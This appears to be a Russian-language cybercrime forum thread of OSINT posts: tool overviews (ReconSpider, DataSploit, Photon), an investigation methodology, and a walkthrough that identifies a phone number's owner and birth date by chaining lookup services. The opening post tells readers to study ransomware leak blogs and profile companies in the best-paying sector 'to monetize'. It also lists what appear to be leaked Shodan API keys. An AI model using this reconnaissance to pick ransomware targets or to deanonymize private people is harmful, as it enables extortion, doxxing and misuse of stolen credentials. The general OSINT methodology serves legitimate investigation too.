происходит, и какие у нее события.
Допустим из интересного, такая новость:
Компания Arrow Electronics подписала новое соглашение о дистрибуции VMware с Broadcom, расширив свое покрытие в Европе до 20 стран.
Дистрибьютор продолжит обслуживать регионы, которые он охватывал до приобретения Broadcom, и теперь включает в себя Исландию, Ирландию, Италию, Нидерланды, Словакию, Чехию и Швейцарию.
Он будет поставлять полный портфель инфраструктуры частного облака VMware, предоставляя партнерам-реселлерам доступ к своим техническим знаниям, программам обучения и сертифицированным ресурсам.
Ник Баннистер (на фото), президент подразделения корпоративных вычислительных решений Arrow в регионе EMEA, сказал: «Являясь дистрибьютором VMware на протяжении 20 лет и эксклюзивным агрегатором решений Symantec по кибербезопасности для Broadcom в Европе, мы намерены продолжить наши отношения и сыграть решающую роль в новом подходе VMware к выходу на рынок».
Click to expand...
Сама новость: <https://iteuropa.com/news/arrow-and-broadcom-expand-vmware-
distribution-deal>
Дата новости: June 3, 2024
Как итог мы сделали поверхностный осинт отдельно взятой компании (не полный, я
просто накидал вам тейки), и получили немного больше информации, нежели просто
"посмотреть в зуминфо".
Потому что просмотр в зуминфо, это не осинт, это банальный пробив.
К чему я это все? К тому, что когда мы строим такие связи, пробиваем конкурентов, копаем личную информацию на сотрудников, мы можем позволить себе больше идей и методов атак. Кажется, что это трудоемкий процесс, но на самом деле одна компания занимает от силы 2-4 часа (зависит от кол-ва сотрудников), в день таких компаний можно делать 3-4 штуки. Это к тому, что пока вы ищете варианты "как заработать" или "что делать" - вы можете заняться сбором такой информации, чтобы в дальнейшем ее монетизировать.
Как первое домашнее задание (если вам интересна эта тема), сделайте вот что:
посмотрите блоги рансомщиков, какой сектор лучше платит. Проанализируйте, и
соберите инфу на 10-20 компаний из этого сектора, чтобы в дальнейшем это
монетизировать.
В будущих статьях я хочу рассказать об углубленном осинте, с использованием
уже платных аккаунтов, так же затронуть тему софта (с гитхаба), тему
регистрации акков по типу линкеда (а он капризный последнее время), а так же
общей настройки системы.
После того, как мы подготовимся в рамках цикла статей к глубокому осинту, мы
затроним уже тему атак. Различные разводки, методы и т.д.
В данной статье я использовал лишь USA соксы, и свое время. Никаких платных или специфических инструментов. В этом был смысл. Если будет интерес, то конечно продолжу этот цикл. Планы грандиозные.
С уважением.
shodan
ugzKocaJMch22p8ywabAlGQWLCYxYTde
mvqpLKKMMlkyYHUnzVviD0M0C158UV5L
e9SxSRCE1xDNS4CzyWzOQTUoE55KB9HX
olj8BVTzKccQDbfyXSvYYzrrhQhaRW0J
v4YpsPUJ3wjDxEqywwu6aF5OZKWj8kik
2TmIvimpoSl17bytI2lJBtfSDJVpSE6F
PGHgSzfOUl5UJ44qJ53f7tZn9gQwvwIM
кому нужны кеи ставьте лайк с меня кей в пм
Может кто поделиться обозначенным в топике api?
Давайте сразу скажу, что я ламер и могу сразу не допереть. В общем, решил опробовать эту чудо-программу и кроме данных непосредственно самой фотографии ничего не получил. Т.е. пиксели, дата создания (не точная), еще какая-то херота и все. Потом даже выставил полностью все настройки на телефоне так, чтоб геотеги привязывались при съемке, GPS на теле врубил. Полученную в итоге фотку загрузил в прогу, все то же самое. Не кажет она никаких полезных данных. В связи с этим вопрос: вы что-то дополнительное в ней настраиваете? Может докачиваете что-то? Подскажите, плз.
ReconSpider**- новый OSINT фреймворк**
ReconSpider is most Advanced Open Source Intelligence (OSINT) Framework for
scanning IP Address, Emails, Websites, Organizations and find out information
from different sources.
ReconSpider can be used by Infosec Researchers, Penetration Testers, Bug
Hunters and Cyber Crime Investigators to find deep information about their
target.
ReconSpider aggregate all the raw data, visualize it on a dashboard and
facilitate alerting and monitoring on the data.
Overview of the tool:
Performs OSINT scan on a IP Address, Emails, Websites, Organizations and find
out information from different sources.
Correlates and collaborate the results, show them in a consolidated manner.
Use specific script / launch automated OSINT for consolidated data.
Currently available in only Command Line Interface (CLI).
__Скачать
https://github.com/bhavsec/reconspider
https://reconspider.com
Oryon OSINT Browser - попытка разработчиков сделать osint браузер.
Oryon OSINT Browser is a web browser designed to assist researchers in conducting Open Source Intelligence (OSINT) investigations. Oryon comes with dozens of pre-installed tools and a selected set of links cataloged by category.
To safely use all Oryon Browser options, it is recommended that you take the following steps:
1. Check your browser privacy settings. Reset all settings if necessary or
make the necessary changes.
2. Disable browsing history (extension: History On / Off)
3. Enable free proxy (extension: Hotspot Shield Free VPN Proxy)
4. Create a dedicated gmail account
5. Create dedicated accounts on Facebook and Twitter
6. Take a look at the collection of links
7. Check out the Oryon Tools bookmarklet
8. Check installed add-ons (extensions: Context, Extension Manager)
9. Save a copy of the QueryTool spreadsheet on your GoogleDrive and check its
performance with your cases
10. Log in to the MIIS YouTube channel and watch practical video tutorials.
Features
Скачать:https://sourceforge.net/projects/oryon-osint-browser/
Сбор информации при помощи технологии OSINT в связке с DataSploit
В этой статье будет рассмотрено, как при помощи OSINT и адреса электронной почты узнать, какие сайты посещает пользователь.
Для тех, кто не знаком с этой концепцией, поясню, что технология OSINT расшифровывается как Open-Source INTelligence (разведка на основе открытых источников) и в основном представляет собой сбор публично доступной информации в интернете для последующего анализа. С другой стороны, поведенческие характеристики описывают деятельность пользователя, в том числе и перечень посещаемых сайтов. Например, так: «Боб – женатый юрист и использует Dropbox, LinkedIn и Facebook. Также у Боба есть учетная запись в Gmail».
Проблемы безопасности электронной почты
В современном мире не так редки случаи, когда происходит информационная утечка о том, что имена пользователей или электронных ящиков, находится в базе данных веб-приложения.
Зачастую злоумышленник, при помощи исключительно взаимодействия с формой авторизации, может легко догадаться, что электронная почта хранится в базе приложения. То есть можно просто ввести неправильную электронную почту или пароль и посмотреть, каков будет ответ сервера.
Ситуация - Ответ сервера
Электронная почта не хранится в базе приложения - Учетная запись с такой электронной почтой не найдена
Электронная почта хранится в базе данных, но пароль неверный - Пароль неверный, попробуйте сноваClick to expand...
Вышеуказанные примеры позволяют определить, зарегистрирован ли пользователь в системе. Однако не каждое потенциально уязвимое приложение выдает такие ответы. Иногда, информация утекает во время отсылки браузеру статусного HTTP- кода, отличного от 200, или перенаправления на другую страницу, на которой можно извлечь нужные сведения.
Почему эти уязвимости встречаются в приложениях?
Основная причина заключается в желании архитекторов сделать систему более удобной, плюс, в некоторой степени, влияние крупных игроков, таких как Microsoft или Google, которые задают современные тренды в проектировании и написании приложений.
Сервис - Ситуация - Ответ сервера
Outlook - Несуществующий пользователь - Такой учетной записи не существует
Gmail - Несуществующий пользователь - Невозможно найти вашу учетную записьClick to expand...
И тут веб-разработчику может прийти следующая мысль: «Если большие компании так делают, то почему не могу я?».
Но не забывайте о хакерах. Сообщения выше являются понятными для пользователя и помогают сориентироваться, что происходит, но и негативно влияют на безопасность, что особенно актуально, если сайт предназначен для широкой аудитории.
Компаниям следует защищать информацию, хранимую в базах приложений, используемых людьми с определенной религией, расой, сексуальной ориентацией, политическими взглядами и так далее. Эта тема касается сайтов знакомств, игровых сайтов и любых других сервисов, у которых можно получить приватные поведенческие паттерны пользователей.
Рассмотрим подробнее угрозы, связанные с утечкой электронной почты:
Как решить проблему?
С точки зрения разработчика ответ сервера должен быть таким, чтобы не было понятно, что произошло, как показано в таблице ниже.
Ситуация - Ответ сервера
Несуществующая электронная почта - Предоставленные учетные данные не корректны
Существующая почта с неправильным паролем - Предоставленные учетные данные не корректныClick to expand...
Twitter – один из примеров, где было пожертвовано частью удобствами пользователей ради безопасности:
Сервис - Ситуация - Ответ сервера
Twitter - Несуществующий пользователь - Введенная электронная почта и пароль не совпадают ни с одной нашей записью
Click to expand...
Решение оказалось довольно простым: сообщения об ошибках во время авторизации должны иметь такое содержимое, чтобы не было понятно, вы ошиблись при вводе или учетной записи не существует.
OSINT в контексте электронной почты
Начиная с небольших веб-приложений, написанных на PHP, JavaScript или Python, и заканчивая широко известными сайтами по всему миру, включая ERP и CRM системы с открытым исходным кодом, существует масса случаев утечек электронных адресов из баз данных.
Помните, что у хакеров может быть достаточно времени и мотивация на выполнение ручного пентеста и написание утилит, заточенных под конкретную задачу, с целью идентификации электронных адресов с поведенческими характеристиками.
Автоматический OSINT в связке с DataSploit
DataSploit представляет собой фреймворк, реализующий технологию OSINT и написанный на Python, который в автоматическом режиме собирает информацию о доменах, электронной почте, именах пользователей и телефонах. Вы можете использовать DataSploit как внутри Python-приложений, так и в качестве отдельного инструмента через командную строку.
Ниже показан перечень команд для установки DataSploit:
Code:Copy to clipboard
git clone [URL]https://github.com/datasploit/datasploit[/URL] /etc/datasploit
cd /etc/datasploit/
pip install -r requirements.txt
mv config_sample.py config.py
Если установка завершилась успешно, в консоли будет выведено следующее сообщение:
Code:Copy to clipboard
python datasploit.py
True
Для запуска потребуется нужно указать цель или файл.
Формат команды:
Code:Copy to clipboard
datasploit.py [-h] [-i SINGLE_TARGET] [-f FILE_TARGET] [-a] [-q] [-o OUTPUT]
Возможные аргументы:
Аргумент
Описание
-h, --help
Показать справку и выйти
-i SINGLE_TARGET, --input SINGLE_TARGET
Нужно указать цель
-f FILE_TARGET, --file FILE_TARGET
Нужно указать файл
-a, --active
Активное сканирование
-q, --quiet
Тихое сканирование в автоматическом режиме и принятие стандартных ответов
-o OUTPUT, --output OUTPUT
Нужно указать целевую директорию
Ниже показан пример для сбора информации, касающейся конкретного электронного адреса:
Code:Copy to clipboard
python emailOsint.py bob@genericdomain.org
Результат работы команды:
[-] Skipping Hacked because it is marked as disabled.
---> Finding Paste(s)..
[-] google_cse_key not configured
[-] google_cse_key and google_cse_cx not configured. Skipping paste(s) search.
Please refer to http://datasploit.readthedocs.io/en/latest/apiGeneration/.
---> Searching Scribd Docs
---> Checking breach status in HIBP (@troyhunt)
Pwned at 4 Instances
Title: Adobe
BreachDate: 2013-10-04
PwnCount: 152445165
Description: In October 2013, 153 million Adobe accounts were breached with each containing an internal ID, username, email, encrypted password and a password hint in plain text. The password cryptography was poorly done and <a href="http://stricture-group.com/files/adobe- top100.txt" target="_blank" rel="noopener">many were quickly resolved back to plain text. The unencrypted hints also <a href="[http://www.troyhunt.com/2013/11/adobe-credentials-and- serious.html"](http://www.troyhunt.com/2013/11/adobe-credentials-and- serious.html"); target="_blank" rel="noopener">disclosed much about the passwords adding further to the risk that hundreds of millions of Adobe customers already faced.
DataClasses: Email addresses, Password hints, Passwords, Usernames
Title: Dropbox
BreachDate: 2012-07-01
PwnCount: 68648009
Description: In mid-2012, Dropbox suffered a data breach which exposed the stored credentials of tens of millions of their customers. In August 2016, <a href="[https://motherboard.vice.com/read/dropbox-forces-password-resets-after- user-credentials-exposed"](https://motherboard.vice.com/read/dropbox- forces-password-resets-after-user-credentials-exposed"); target="_blank" rel="noopener">they forced password resets for customers they believed may be at risk. A large volume of data totalling over 68 million records <a href="[https://motherboard.vice.com/read/hackers-stole-over-60-million- dropbox-accounts"](https://motherboard.vice.com/read/hackers-stole- over-60-million-dropbox-accounts"); target="_blank" rel="noopener">was subsequently traded online and included email addresses and salted hashes of passwords (half of them SHA1, half of them bcrypt).
DataClasses: Email addresses, Passwords
Title: LinkedIn
BreachDate: 2012-05-05
PwnCount: 164611595
Description: In May 2016, <a href="[https://www.troyhunt.com/observations-and- thoughts-on-the-linkedin-data- breach"](https://www.troyhunt.com/observations-and-thoughts-on-the- linkedin-data-breach"); target="_blank" rel="noopener">LinkedIn had 164 million email addresses and passwords exposed. Originally hacked in 2012, the data remained out of sight until being offered for sale on a dark market site 4 years later. The passwords in the breach were stored as SHA1 hashes without salt, the vast majority of which were quickly cracked in the days following the release of the data.
DataClasses: Email addresses, Passwords
Title: MySpace
BreachDate: 2008-07-01
PwnCount: 359420698
Description: In approximately 2008, <a href="[http://motherboard.vice.com/read/427-million-myspace-passwords-emails- data-breach"](http://motherboard.vice.com/read/427-million-myspace- passwords-emails-data-breach"); target="_blank" rel="noopener">MySpace suffered a data breach that exposed almost 360 million accounts. In May 2016 the data was offered up for sale on the "Real Deal" dark market website and included email addresses, usernames and SHA1 hashes of the first 10 characters of the password converted to lowercase and stored without a salt. The exact breach date is unknown, but <a href="https://www.troyhunt.com/dating-the-ginormous-myspace- breach" target="_blank" rel="noopener">analysis of the data suggests it was 8 years before being made public.
DataClasses: Email addresses, Passwords, Usernames
---> Checking Fullcontact..
[-] fullcontact_api not configured
[-] Full-Contact API Key not configured. Skipping Fullcontact Search.
Please refer to http://datasploit.readthedocs.io/en/latest/apiGeneration/.
---> Searching Clearbit
[-] clearbit_apikey not configured
[False, 'INVALID_API']
[-] Clearbit API Key not configured. Skipping Clearbit Search.
Please refer to http://datasploit.readthedocs.io/en/latest/apiGeneration/.
---> Basic Email Check(s)..
[-] mailboxlayer_api not configured
[-] mailboxlayer_api not configured
[-] MailBoxLayer_API Key not configured. Skipping basic checks.
Please refer to http://datasploit.readthedocs.io/en/latest/apiGeneration/.
---> Searching Slideshare
---> Searching Whoismind for associated domains
Мы получили очень много информации. При помощи базового запроса выяснилось, что пользователь с электронной почтой bob@genericdomain.org использует Adobe, Dropbox, LinkedIn и MySpace.
Обратите внимание, что для получения информации DataSploit интенсивно использует сторонние сервисы и API. Отчет выше был получен при помощи публичного сервиса haveibeenpwned.com (HIBP), который проверяет, присутствует ли конкретный адрес электронной почте в массиве скомпрометированных данных.
Соответствующая секция в отчете выше:
---> Checking breach status in HIBP (@troyhunt)
Для более детального отчета по другим раздела нужно получить API-ключ у соответствующего провайдера информации, который поддерживает DataSploit:
Затем нужно выполнить соответствующие настройки в файле config.py.
Заключение
В этой статье мы коснулись информационных утечек и технологии OSINT, которая позволяет получить информацию из открытых источников. В частности, был рассмотрен пример поиска адреса электронной почты по общедоступным базам данных.
Некоторые сайты и приложения имеют отношение интернет-знакомствам, игровой тематике, или предназначены для людей, придерживающихся определенной религии или сексуальной ориентации или политической идеологии. Хакеры с хорошей мотивацией и большим запасом времени могут выполнить тест на проникновение вручную, чего может быть вполне достаточно для идентификации поведенческих характеристик пользователя.
Кроме того, мы рассмотрели фреймворк DataSploit, который автоматизирует сбор информации по технологии OSINT. В частности, скрипт emailOsint.py предназначен для сбора информации об электронной почте. Более того, был рассмотрен пример, как легко выяснить сайты, на которых зарегистрирован указанная электронная почта.
Автор: Behrouz Mansoori
Классическая методология OSINT, которую вы найдете повсюду, проста:
Далее, либо повторите поиск путем комбинации только что собранных данных, либо завершите расследование и напишите отчет.
Очень часто во время расследований мы теряемся в объеме собранных данных, и трудно понять, в каком направлении следует копать. В этом случае, я думаю, будет полезно сделать перерыв и вернуться к шагам 3 и 4: проанализируйте и суммируйте то, что вы нашли, перечислите, что может помочь вам развить и определите новые (или более точные) вопросы, на которые все еще нужны ответы.
Никогда не сдавайтесь: возможно, у вас будет ощущение, что вы изучили все возможности получения информации о цели. Но не сдавайтесь. Сделайте перерыв (час или день, занимаясь чем-то другим), затем снова проанализируйте входные данные и попытайтесь взглянуть на них с другой точки зрения.
Храните доказательства: информация исчезает онлайн очень быстро. Представьте, что человек, которого вы ищите, начинает что-то подозревать, внезапно все его учетные записи в социальных сетях и веб-сайты могут быть удалены им из сети. Так что храните доказательства: скриншоты, веб-архивы, а не только ссылки на онлайн ресурсы.
В криминалистике, ключевым моментом является сбор событий, происходящих в одно и то же время. Когда был создан сайт? Когда была создана учетная запись FB? Когда было написано последнее сообщение в блоге?
Есть еще два других метода, которые я считаю полезными. Первый - это блок- схемы, описывающие рабочий процесс для поиска дополнительной информации по типу данных (например, по электронной почте). Лучшее, что я видел, было сделано Майклом Баззеллом на https://inteltechniques.com/blog/2018/03/06/updated-osint-flowcharts/. Например, вот рабочий процесс Майкла Баззелла при изучении информации на адрес электронной почты:
Я думаю, будет хорошей идеей начать разработку собственной типовой схемы расследования и постепенно улучшать его с течением времени с помощью новых хитростей и сервисов, которые вы найдете. Бесплатно разработать блок-схему онлайн вы можете на draw.io
Последняя методология, которую я бы порекомендовал для длительных исследований, - это анализ конкурирующих гипотез . Эта методология была разработана ЦРУ в 70-х годах, чтобы помочь аналитику убрать предвзятость из своего анализа и тщательно оценить различные гипотезы.
Подготовьте ОС
Прежде чем приступить к расследованию, необходимо рассмотреть несколько аспектов безопасности работы, чтобы не настораживать людей и компании, которые вы исследуете. Посещение личного веб-сайта цели может дать ей ваш IP-адрес и, следовательно, ваше местоположение, использование вашей личной учетной записи социальной сети в браузере с которого проводится расследование, может привести к автоматическому щелчку по лайку, реализованному с помощью уязвимости.
Используйте коммерческий VPN или Tor для всех подключений из вашего браузера. Большинство коммерческих VPN предоставляют серверы в разных странах, и Tor позволяет вам выбрать страну выходного узла, поэтому я пытаюсь выбрать страну, которая не будет выделяться в этом контексте (США для расследования целей из США и т.д.). Используйте аккаунты в социальных сетях, созданные под вымышленным именем, чтобы случайно не деанонимизироваться перед целью.
Инструменты OSINT не имеют значения, гораздо важнее то, что вы делаете с этими инструментами. Тестируйте инструменты, читайте их код, создавайте свои собственные инструменты и т.д., Но убедитесь, что вы понимаете, что делаете.
Следствием этого является то, что не существует идеального инструментария. Лучший инструментарий - тот, который вы знаете, любите и осваиваете. Но позвольте мне рассказать вам, что я использую и какие другие инструменты могут вас заинтересовать.
Я использую Chrome в качестве браузера для расследования, главным образом потому, что Hunchly доступен только для Chrome. Я добавляю к нему несколько полезных плагинов:
[archive.is Button](https://chrome.google.com/webstore/detail/archiveis- button/cgjpabpjaocpgppajkeplhbipbdippdm) позволяет быстро сохранить веб- страницу в archive.is (подробнее об этом позже)
[Wayback Machine](https://chrome.google.com/webstore/detail/wayback- machine/fpnmgdkabkmnadcjpehmlllkndpkmiak) для поиска заархивированной страницы в archive.org
[OpenSource Intelligence](https://chrome.google.com/webstore/detail/open- source-intelligence/bclnaepfegjimpinlmgnipebbknlmmbh) предоставляет быстрый доступ ко многим инструментам OSINT
[EXIF Viewer](https://chrome.google.com/webstore/detail/exif- viewer/mmbhfeiddhndihdjeganjggkmjapkffm) позволяет быстро просматривать данные EXIF ??в изображениях
[FireShot](https://chrome.google.com/webstore/detail/take-webpage- screenshots/mcbpblocgmgfnpjjppndjkmgjaogfceg) позволяет быстро сделать скриншот
Hunchly
Я недавно начал использовать Hunchly, и это отличный инструмент. Hunchly - это расширение для Chrome, которое позволяет сохранять, и плдписывать все веб-данные, найденные вами в ходе расследования. По сути, вам просто нужно нажать «Захват» в расширении, когда вы начинаете расследование, и Hunchly сохранит все веб-страницы, которые вы посещаете, в базе данных, что позволит вам добавлять к ним заметки и теги.
Maltego
По сути, [Maltego](https://www.paterva.com/web7/buy/maltego- clients/maltego.php) предлагает графический интерфейс для представления графиков и преобразования для поиска новых данных в графике (например, доменов, связанных с IP-адресом из базы данных Passive DNS). Вы можете использовать Maltego Community Edition, который ограничивает охват поиска, но этого должно быть достаточно для небольших исследований.
Harpoon
Этот инструмент начинался как утилита для анализа угроз, но сейчас в нем много команд для OSINT.
Python
Очень часто вы сталкиваетесь с конкретными задачами по сбору данных и визуализации, которые не могут быть легко выполнены с помощью известных инструментов. В этом случае вам придется написать собственный код. Для этого я использую python, любой современный язык программирования будет работать одинаково хорошо, но мне нравится гибкость python и огромное количество доступных библиотек.
Джастин Зейтц (автор Hunchly) - написал справочник по Python и OSINT, вам обязательно стоит взглянуть на его блог и книгу «Black Hat Python».
SpiderFoot - это инструмент разведки, который собирает информацию с помощью множества различных модулей. Он имеет приятный веб-интерфейс и генерирует графики, показывающие связи между различными типами данных.
Recon-ng - это хороший инструмент CLI для запроса различных платформ, социальных ��етей или платформ анализа угроз.
Buscador - это виртуальная машина Linux, в которую встроено множество различных инструментов OSINT. Я всегда предпочитаю иметь свои собственные системы, но это хороший способ опробовать новые инструменты без необходимости устанавливать их один за другим.
Техническая инфраструктура
Анализ технической инфраструктуры находится на перекрестке между хакингом и OSINT, но это определенно важная часть расследований.
Вот что вы должны искать:
IP и домены: для этого есть много разных инструментов, но я считаю, что https://community.riskiq.com/ является одним из лучших источников информации. Бесплатный доступ дает вам 15 запросов в день через веб-интерфейс и 15 через API.
Сертификаты: Censys.io - отличный инструмент
crt.sh - также очень хорошая база данных cертификатов
Сканирование: часто полезно знать, какие сервисы работают на IP, вы можете выполнить сканирование самостоятельно с помощью nmap , но вы также можете положиться на платформы, выполняющие регулярное сканирование всех адресов IPv4. Две основные платформы - Censys и Shodan , обе они сосредоточены на разных аспектах (больше IoT для Shodan, больше TLS для Censys), поэтому полезно знать и использовать их обе.
Еще одним источником информации является Rapid7 Open Data, но вам придется скачивать файлы сканирования и проводить исследования самостоятельно.
Поддомены: существует множество различных способов найти список поддоменов для домена. PassiveTotal и BinaryEdge реализуют эту функцию напрямую.
Аналитика Google и социальные сети : последняя информация, которая действительно интересна, - это проверить, используется ли один и тот же идентификатор Google Analytics / Adsense на нескольких веб-сайтах. Этот метод был открыт в 2015 году и хорошо [описан сообществом Bellingcat](https://www.bellingcat.com/resources/how-tos/2015/07/23/unveiling- hidden-connections-with-google-analytics-ids/) . Чтобы искать эти связи, я в основном использую SpyOnWeb и NerdyData.
Поисковые системы
В зависимости от контекста, вы можете захотеть использовать другую поисковую систему во время расследования. Я в основном полагаюсь на Google и Bing (для Европы или Северной Америки), Baidu (для Азии) и Яндекс (для России и Восточной Европы).
Изображения
Для изображений есть две вещи, которые вы хотите знать: как найти дополнительную информацию об изображении и как найти похожие изображения.
Чтобы найти дополнительную информацию, первым делом нужно посмотреть данные exif . Exif-данные - это данные, внедренные в изображение при его создании, и они часто содержат интересную информацию о дате создания, используемой камере, иногда GPS-данные и.т.д. Чтобы проверить это, мне нравится использовать командную утилиту ExifTool, но расширение Exif Viewer которое можно установить для основных браузеров тоже очень удобно.
Чтобы найти похожие изображения, вы можете использовать Google Images, Bing Images или TinyEye. TinyEye имеет удобный [API](http://www.automatingosint.com/blog/2015/11/osint-youtube-tineye- reverse-image-search/), а Bing очень полезную функцию, позволяющую вам искать определенную часть изображения.
Нет простого способа проанализировать само содержание изображения и, например, найти его местоположение. Вам нужно будет найти на изображении определенные элементы, которые позволят вам угадать, в какой стране это может быть, а затем провести онлайн-исследование и сравнить его со спутниковыми изображениями и фото c Google Street View.
Социальные сети
Для социальных сетей доступно множество инструментов, но они сильно зависят от платформы. Вот краткая выдержка из интересных инструментов и приемов:
https://github.com/x0rz/tweets_analyzer - отличный способ получить обзор активности учетной записи Twitter.
Facebook: лучший ресурс для расследования в Facebook - это https://inteltechniques.com/osint/facebook.html
LinkedIn: самый полезный трюк, который я нашел в LinkedIn, это как найти профиль LinkedIn на основе адреса электронной почты
Веб архивы
Существует несколько платформ для кеширования веб-сайтов, которые могут стать отличным источником информации во время расследования либо потому, что веб- сайт не работает, либо для анализа исторического развития веб-сайта. Эти платформы либо автоматически кэшируют сайты, либо кэшируют сайт по требованию.
Поисковые системы: большинство поисковых систем кэшируют содержимое веб-сайтов при их сканировании. Это действительно полезно, и многие веб-сайты доступны таким образом, но имейте в виду, что вы не можете контролировать, когда он кэшировался в последний раз (очень часто менее недели назад), и, скорее всего, он скоро будет удален, поэтому, если вы найдете там что-нибудь интересное, подумайте о сохранении закэшированной страницы.
https://archive.org/ - это отличный проект, целью которого является сохранение всего, что опубликовано в Интернете, включая автоматическое сканирование веб-страниц и сохранение эволюции страниц в огромную базу данных. Важно знать, что интернет-архив удаляет контент по требованию (они сделали это, например, для компании Stalkerware Flexispy), поэтому вы должны сохранять контент, где-то еще.
Другие платформы ручного кэширования. Мне очень нравится archive.today, который позволяет сохранять снимки веб-страниц и искать снимки, сделанные другими людьми.
Иногда бывает неудобно вручную запрашивать все эти платформы, чтобы проверить, была ли кэширована веб-страница или нет. Я реализовал простую команду в Harpoon, чтобы сделать это: harpoon cachehttps://citizenlab.ca
Сбор доказательств
Вы определенно погрязнете в большом количестве данных, которые дублируются, веб-страницы изменяются, учетные записи Twitter исчезают и.т.д.
Вы не можете полагаться только на Интернет-архив, используйте другие платформы
кеша и, если возможно, локальные копии.
- Сохраняйте изображения, документы и.т.д.
- Делайте скриншоты
- Сохраняйте данные о социальных сетях
Естественно, это далеко не все способы, помогающие найти ту или иную информацию. Осинтеры составляют целые подборки полезных сервисов, они часто меняются, и пополняются новыми инструментами.
https://github.com/jivoi/awesome-osint
https://osintframework.com
https://github.com/netstalking-core/netstalking-osint
https://github.com/automatingosint/osint_public
https://github.com/jmortega/osint_tools_security_auditing
Photon - очень быстрый краулер для OSINT
Key Features
Data Extraction
Photon can extract the following data while crawling:
The extracted information is saved in an organized manner or can be exported as json.
Flexible
Control timeout, delay, add seeds, exclude URLs matching a regex pattern and
other cool stuff. The extensive range of
optionsprovided by Photon lets
you crawl the web exactly the way you want.
Genius
Photon's smart thread management & refined logic gives you top notch
performance.
Still, crawling can be resource intensive but Photon has some tricks up it's sleeves. You can fetch URLs archived by archive.orgto be used as seeds by using --wayback option.
In Ninja Mode which can be accessed by --ninja, 4 online services are used to make requests to the target on your behalf.
So basically, now you have 4 clients making requests to the same server simultaneously which gives you a speed boost if you have a slow connection, minimizes the risk of connection reset as well as delays requests from a single client.
Plugins
Docker
Photon can be launched using a lightweight Python-Alpine (103 MB) Docker
image.
Code:Copy to clipboard
$ git clone https://github.com/s0md3v/Photon.git
$ cd Photon
$ docker build -t photon .
$ docker run -it --name photon photon:latest -u google.com
To view results, you can either head over to the local docker volume, which you can find by running docker inspect photon or by mounting the target loot folder:
Code:Copy to clipboard
$ docker run -it --name photon -v "$PWD:/Photon/google.com" photon:latest -u google.com
Frequent & Seamless Updates
Photon is under heavy development and updates for fixing bugs. optimizing
performance & new features are being rolled regularly.
If you would like to see features and issues that are being worked on, you can do that on Development project board.
Updates can be installed & checked for with the --update option. Photon has seamless update capabilities which means you can update Photon without losing any of your saved data.
Contribution & License
You can contribute in following ways:
Please read the guidelines before submitting a pull request or issue.
:smile83:Особенности национального OSINT, или ищем по MSISDN:smile56:.
Те, кто занимается конкурентной разведкой и сбором информации из открытых
источников, часто сталкиваются с проблемой идентификации абонента конкретного
сотового телефона (далее MSISDN, почему MSISDN??? Да потому что номера вы
везде будете вводить в международном формате). В сети существует большое
количество различных сервисов и способов «пробива» MSISDN. Я не буду заострять
внимание на очевидных, типа пойди в раздел услуг на xss.is и закажи
принадлежность)
Или обратись к тем, кто накапливают материалы на эту тему.
Я же расскажу о некоторых инструментах, которые вам неожиданно могут помочь в
нелёгком деле деанона не за ваши кровные, а за просто так)) Объяснять принципы
работы приложений, указанных ниже я не буду, дабы экономить и ваше и моё
время, мальчики то все большие)) Нам это вторично, главное полученный
результат.
Те же, кто знаком с приложением numbuster, могут знать, что закончилась лафа
лёгкого пробива, парни набрали аудиторию и теперь хотят ещё инсталлов их
приложения в PlayMarket и AppStore)). Нам же на свой любимый смартфон совсем
не хочется ставить всякое дерьмо, которое нам там совершенно не нужно.
Раньше можно было зайти на сайт numbuster.com, ввести номер телефона, к
которому имеется доступ, чтобы получить проверочную смс, а затем спокойно
лупить номера в поиск и получать profit. Сейчас же, данная фича не канает и
при получении «совпадения» мы видим что-то типа:
Дабы нас не расстраивал такой ответ, устанавливаем на свою тачку эмулятор
Android OS, кому что нравится, мне проще BlueStacks, хоть он и требовательный
к ресурсам, но зато прост в установке. Кому надо, берём его с офф сайта тут:
http://www.bluestacks.com/download.html?utm_campaign=homepage-dl-button-ru
Проблем с установкой, думаю, не возникнет. Для работы нам понадобится аккаунт
Google и телефонный номер, на который вы сможете принять смс с кодом проверки.
После чего лезем в PlayMarket и устанавливаем numbuster. Приложение потребует
номер телефона для отправки смс с кодом проверки. Вводим. Если всё успешно, то
вы получите что-то на подобии:
Для осуществления поиска жмакаем на кнопку «Проверить номер». Я наберу какой-
нибудь случайный MSISDN:
Да ладно? Вот это удача! Да неужели, ну-ка ну-ка, удостоверимся через ещё один
источник, проверим через восстановление доступа Вконтакте
(https://vk.com/restore). Для этого на указанной странице совершаем три
последовательных шага: вводим номер телефона, вводим Фамилию (в нашем случае
это: или Куклачев или Куклачёв или Kuklachev, вот такие дела! Обращаем
внимание, это важно, ошибка даже в одну букву критична, поэтому используём все
варианты). Отбросив лирику, в нашем конкретном случае получили Имя, город и
какую-никакую фотографию. Действительно Куклачёв.
Для железной уверенности заходим на truecaller.com, где нам потребуется также
аккаунт либо Гугла, либо Мелкомягких. Кажется, выше нам он был нужен для
BlueStacks, вот его же и берём. Я думаю, что разобраться не сложно куда
вводить MSISDN (там посередине ). В сухом остатке имеем:
Да, в целом пример достаточно комичный и получить реквизиты известного
человека (дата рождения, место рождения и т.д.) не составит большого труда. В
жестокой реальности же можно столкнуться с большим количеством проблем. Посему
не упускаем даже мельчайшие детали. Даже если бы пример был без Куклачёва,
можно попробовать дополнить наше досье данными о дате рождения. Можно попытать
счастье в Skype. Есть там такой раздел “Поиск контактов”:
Да, его у меня нет в контактах)))) Нажимаем «поиск», получаем:
В итоге получили полную дату рождения. Даже не зная отчество, мы уже дохрена
чего имеем. Остальное дело техники)) Конечно, последовательность поиска можно,
а иногда и нужно менять. Всё было сделано для демонстрации, а все совпадения с
реальными людьми просто совпадения. Прошу прощения за воду.И пишите свои
способы! Думаю, это будет всем интересно!))
Целенаправленные атаки: разведка на основе открытых источников (OSINT)
В одной из прошлых колонок я рассказал о стадиях целенаправленных атак (kill chain). Первая стадия, стадия «разведки», начинается задолго до того, как атакующий дотронется до первой машины жертвы. От количества и качества данных, собранных на этом этапе, зависит успешность атаки и, самое главное, стоимость ее проведения.
Разумеется, можно стучаться эксплоитами на уязвимые сервисы, доступные на периметре (и, например, засветить сплоиты и свое присутствие в логах систем защиты), а можно использовать spear phishing и закрепиться на рабочей станции внутри периметра. Результат будет достигнут в обоих случаях, но стоимость атаки совершенно разная.
